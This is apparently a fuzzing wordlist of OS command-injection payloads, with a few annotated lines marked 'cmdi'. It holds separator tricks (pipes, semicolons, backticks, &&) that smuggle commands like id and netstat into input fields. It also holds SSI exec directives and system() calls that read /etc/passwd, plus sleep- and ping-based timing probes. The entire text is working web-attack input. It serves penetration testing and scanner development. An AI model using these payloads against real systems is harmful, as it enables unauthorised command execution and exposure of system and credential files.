+|+dir+c:",10,cmdi,anom $+|+dir+c:"
+dir+c:",8,cmdi,anom $&&dir+c:"
+|+dir+c:/
&&+|+dir c:/
$&&dir+c:/
+dir+c:+|
+|+dir+c:+|
dir+c:",7,cmdi,anom ||+dir|c:"
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/usr/bin/id;-->
/index.html|id|
;id
;netstat -a;
|/usr/bin/id
|id|
||/usr/bin/id|
|id;
;id|
;|/usr/bin/id|
/usr/bin/id
id
id;
/usr/bin/id|
;/usr/bin/id
|usr/bin/id
`id`
`/usr/bin/id`
a;id
a);id;
a);id|
a;id|
a|id
a)|id;
a);/usr/bin/id
a;/usr/bin/id
a;/usr/bin/id;
a);/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
;system('cat /etc/passwd')
;system('id')
cat /etc/passwd
& ping -i 30 127.0.0.1 &
ping -i 30 127.0.0.1
`ping 127.0.0.1`
& id
; id
asdf3334
; /bin/sleep 31 ;
'false'
'true'
"`false`"
"`true`"
`false`
`true`
' ; /bin/sleep 31 ;
| /bin/sleep 31 ;
'| /bin/sleep 31 ;
ping.exe -n 31 127.0.0.1
